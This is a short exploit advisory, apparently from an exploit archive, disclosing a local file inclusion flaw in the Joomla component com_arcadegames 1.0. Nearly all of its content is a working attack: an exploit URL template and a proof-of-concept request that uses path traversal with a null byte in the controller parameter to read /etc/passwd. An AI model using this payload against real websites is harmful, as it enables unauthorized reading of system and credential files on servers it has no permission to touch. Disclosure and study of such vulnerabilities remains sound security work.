id: 11743
date: 04/12/2010
title: Joomla Component com_arcadegames Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

===================================================================
Joomla Component com_arcadegames Local File Inclusion Vulnerability
===================================================================

=================================================================================================================
 
 
  [o] Joomla Component Arcade Games Local File Inclusion Vulnerability
  
       Software : com_arcadegames version 1.0
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_arcadegames&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
 
 
=================================================================================================================



#  0day.today [2023-03-24]  #